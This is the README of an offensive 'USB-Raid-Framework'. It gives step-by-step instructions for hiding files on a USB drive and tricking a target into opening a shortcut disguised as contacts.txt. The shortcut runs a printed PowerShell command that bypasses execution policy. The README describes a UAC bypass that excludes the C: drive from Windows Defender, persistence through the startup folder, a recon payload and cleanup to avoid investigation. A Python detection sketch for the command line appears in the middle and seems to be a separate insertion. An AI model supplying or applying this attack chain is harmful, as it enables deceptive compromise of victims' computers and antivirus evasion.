USB-Raid-Framework

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments

An offensive security framework that weaponizes any standard USB Device

Description

This framework is designed to be implemented on any standard USB drive.

This attack takes advantage of the ability to run PowerShell commands from inside a .lnk file.

The following video is another example of how this method may be implemented.

After downloading the .zip file and placing the contents on your USB drive, you'll want to delete the ReadMe.md and LICENSE files.

Next, you will want to make sure the h directory and s1.bat file have the hidden attribute. You do not want these files to be visible to your target.

Now in the root directory you should have 3 files:

  • A hidden h directory - Folder containing all the files needed to be moved onto your target's system, and the initial script to be run
  • A hidden s1.bat file - A bat file called by the shortcut to move all the above files and execute the initial script
  • A contacts.txt .lnk file (shortcut) - A shortcut phishing file disguised as a text file to entice your target to open it

The h directory will contain 5 more files:

  • contacts.txt - The actual text file to be opened by the shortcut to convince your target they just opened a regular txt file
  • exception.ps1 - A script containing a UAC bypass to open an admin window and add the target's C:/ drive to the Windows Defender exclusion list. This will prevent further tools you download from being flagged by Defender
  • intitial.ps1 - This is a script that will be run one time when the target opens the fake text file
  • persist.cmd - This is a file added to the startup folder to achieve persistence. It will call the persist.ps1 file stored in the AppData directory
  • persist.ps1 - This is the file that will contain your script that will be run every time the target boots up their computer

Getting Started

Taking advantage of a little-known secret, we will be running PowerShell code embedded in a shortcut's target field, as seen in the image below.

This has a few advantages.

  • You can't run a regular PowerShell script by double-clicking on it. It will only open in your default text editor. It will run from a shortcut.
  • External PowerShell scripts cannot be run without triggering the UAC prompt. We use the shortcut to open the target's own PowerShell console and run the script from there, to trick their system into thinking it is from a native script.

This is the code in that target text box:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoP -NonI -W H -ep bypass ".((gwmi win32_volume -f 'label=''259''').Name+'s1.bat')

This code opens a PowerShell console, bypasses the execution policy, identifies which drive letter our USB has, and runs our bat file.

In order for it to find our drive we must change the label of our USB to match the label used in our code in the target text box.

For this example notice the label in the image below and the code above are both 259. This can be changed but they both need to match.
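Seen from the detection side, this shortcut target leaves a distinctive command line in process-creation telemetry: abbreviated PowerShell flags, a hidden window, an execution-policy bypass and a volume lookup by label. The sketch below is an added example, not part of this framework; the function names, the indicator set and the threshold are assumptions, and the sample lines are constructed apart from the target string quoted above.

```python
import re

# powershell.exe parameters of interest; any unambiguous prefix is accepted.
PARAMS = ("noprofile", "noninteractive", "windowstyle",
          "executionpolicy", "encodedcommand")
ALIASES = {"ep": "executionpolicy", "e": "encodedcommand", "ec": "encodedcommand"}
VOLUME_LOOKUP = re.compile(r"win32_(volume|logicaldisk)|get-volume", re.I)
SCRIPT_REF = re.compile(r"\.(bat|cmd|ps1)\b", re.I)

def expand_flags(cmdline):
    """Map abbreviated flags (-NoP, -W, -ep ...) to full names and their values."""
    tokens = cmdline.split()
    found = {}
    for i, tok in enumerate(tokens):
        if len(tok) < 2 or tok[0] not in "-/":
            continue
        name = tok[1:].lower()
        matches = [p for p in PARAMS if p.startswith(name)]
        full = ALIASES.get(name) or (matches[0] if len(matches) == 1 else None)
        if full:
            found[full] = tokens[i + 1].lower() if i + 1 < len(tokens) else ""
    return found

def indicators(cmdline):
    """Return the indicators present in one process-creation command line."""
    if "powershell" not in cmdline.lower():
        return []
    flags = expand_flags(cmdline)
    hits = []
    style = flags.get("windowstyle")
    if style and "hidden".startswith(style):      # the page's command uses "-W H"
        hits.append("hidden-window")
    if flags.get("executionpolicy") in ("bypass", "unrestricted"):
        hits.append("execution-policy-bypass")
    if VOLUME_LOOKUP.search(cmdline):
        hits.append("volume-label-lookup")
    if SCRIPT_REF.search(cmdline):
        hits.append("script-reference")
    return hits

def is_suspicious(cmdline, threshold=3):          # threshold is an assumption
    return len(indicators(cmdline)) >= threshold

# Constructed sample command lines; the first is the shortcut target shown above.
SAMPLES = [
    r"""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoP -NonI -W H -ep bypass ".((gwmi win32_volume -f 'label=''259''').Name+'s1.bat')""",
    r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1",
    r"C:\Windows\System32\notepad.exe E:\contacts.txt",
]
```

Feed it the command-line field of process-creation events (for example Sysmon Event ID 1 or Security Event ID 4688 with command-line auditing enabled); pairing a hit with a parent process of explorer.exe narrows it to shortcut launches.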

Executing program

Once you have all of the above set up you are ready to execute this attack vector

You will want to have 2 payloads ready.

  • Your initial payload to be run once this attack has been initiated.

    I use my ADV Recon payload to gather as much info on my target as possible

  • The payload you want to be run with persistence at each reboot on your targets PC (This payload will vary depending on your goal)

Once this attack vector has been initiated by your target opening the fake text file link, it will open the real hidden txt file in the h directory to avoid suspicion.

The shortcut will then run the s1.bat file that will initialize the rest of your scripts.

First your initial payload will run, followed by moving your persistance.bat file to the startup directory.

Then your persistence.ps1 file will be added to the AppData folder and run once now and again at each startup.

Finally, the real hidden text file will replace your fake txt shortcut link and the rest of the files will be deleted to avoid further investigation into your USB drive.

In a real-world scenario you would also want to make the USB drive look realistic with a photo album or something else to entice your target to get in contact with you by clicking on the fake contacts.txt file.

Dependencies

  • An internet connection
  • Windows 10,11

Contributing

All contributors names will be listed here

I am Jakoby

Version History

  • 0.1
    • Initial Release

Contact

My Socials

  • YouTube
  • Twitter
  • Instagram
  • Discord

Acknowledgments
